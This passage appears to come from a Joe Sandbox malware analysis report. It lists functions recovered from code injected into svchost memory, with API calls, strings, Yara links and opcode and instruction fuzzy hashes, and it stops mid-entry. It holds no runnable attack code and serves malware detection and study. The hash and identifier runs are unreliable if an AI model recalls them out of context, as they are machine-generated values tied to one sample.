                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 84adbe2866ac1e2fb66f4364389380746c042a873a352a778f6fc0d74beb4a81
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E961BD33608F88CAEB29DF65E88639D77A0F358B89F044255EF4A17B99DB38C084C714
                                                                          Function 00000257E10AAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: ff1a59e2cae9877e41fdea86006ac35bc3c2ac676c8524eb9a1b3888c61eb4ec
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 6351E172188B80CAEB7D8F65B88B35D77A4F354B86F148156DB8A47BD5CB38C490C718
                                                                          Function 00000257E107A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 83f5e9c311c848ec4fd2a0c7c7ec5783ac5279642614553dd1b91d6c427617f7
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 0E51D432148B80CAEB7AAF25B84B37877A0F354B86F1C8155FA8947BD5CB78D491C708
                                                                          Function 00000257E1078405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: ee813d9cd048edd468e5633751c041e363784de44c713b5dfd16f397443d62c2
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 5A51D272749B008AEB5EEF15F80BB283795F350B99F5581A6DA064778CEB74DCC08708
                                                                          Function 00000257E10783E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fef70a26cb8617019fb27fbb8b1d28829320fb28e202bfa77e2c679c26842ebd
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 7A31A271249B40D6E71AEF21FC4B72977A4F340B9AF158059EE5A07B88DB38C980C708
                                                                          Function 00000257E10B2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 68dab6fe74a75fbd6536b3dcbd820ba112786e56dfb684d69ab30bb7c3da5d7e
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 69D13032B58F8089E716CFB9E84A79C3BB1F354B99F008256CE5997B99DB38D406C344
                                                                          Function 00000257E10A14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 1db1360ba7b751730b1259011854ce9dc25cb220d1e3979c32bb2201401d3ca7
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 16015A32648F90C6E709DF66FD0A64A77A4F788F82F084825EA5A43729DE38C451C744
                                                                          Function 00000257E10B2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                          Function 00000257E10A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                          Function 00000257E10A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                          Function 00000257E1079E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                          Function 00000257E10A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                          Function 00000257E10B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                          Function 00000257E10A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                          Function 00000257E1077356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                          Function 00000257E10773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598205242.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                          Function 00000257E10A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                          Function 00000257E10A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000030.00000002.3598622603.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_48_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90

                                                                          Executed Functions

                                                                          Function 000001F28C931268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8f8718106759883864cae2a8ca865240e286cea242c12ae6e8bb01d1b0de8f1e
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: F4E06DB5641E45C7EB048F62D8083AA3AE1FB8DF86F04C024C90907351DF7D8599C750
                                                                          Function 000001F28C93328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b4d9601b441b195fc890c788491207d0644a6a96c7f54882ecefb715d9f87218
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: B7118471AD0EC382FB60A731F8053F922D4B7543C5F98A1BCD90E87995EF79C0458200
                                                                          Function 000001F28C931ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                            • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                          • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                          • SleepEx.KERNEL32 ref: 000001F28C931ADD
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: b67c1932e62b7ac0013a9a1692b6bd7ceba26b73bf7a76d8ab9135420b3866fa
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 81316871281EC292EB509B36DA512F963F5AB84BD4F0C74B1DE09876BAFF34C851C211
                                                                          Function 000001F28C933844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 62 1f28c933844-1f28c93384f 63 1f28c933869-1f28c933870 62->63 64 1f28c933851-1f28c933864 StrCmpNIW 62->64 64->63 65 1f28c933866 64->65 65->63
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer
                                                                          • API String ID: 0-3528709123
                                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction ID: 35bd7b7e84aeabd97046de9deeb150375f1cc12c8c169a2c29cf3a1cf66da4a6
                                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction Fuzzy Hash: 3ED05E71391A8786FB149FA688C46B06390AB047C4F8C90B4CE0403550DB38C98E9610
                                                                          Function 000001F28C1D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3593423408.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700
                                                                          Function 000001F28C93CA0C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 4292702814-0
                                                                          • Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                          • Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
                                                                          • Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                          • Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620

                                                                          Non-executed Functions

                                                                          Function 000001F28C937D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000031.00000002.3597551720.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_49_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
                                                                          Function 000001F28C93D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
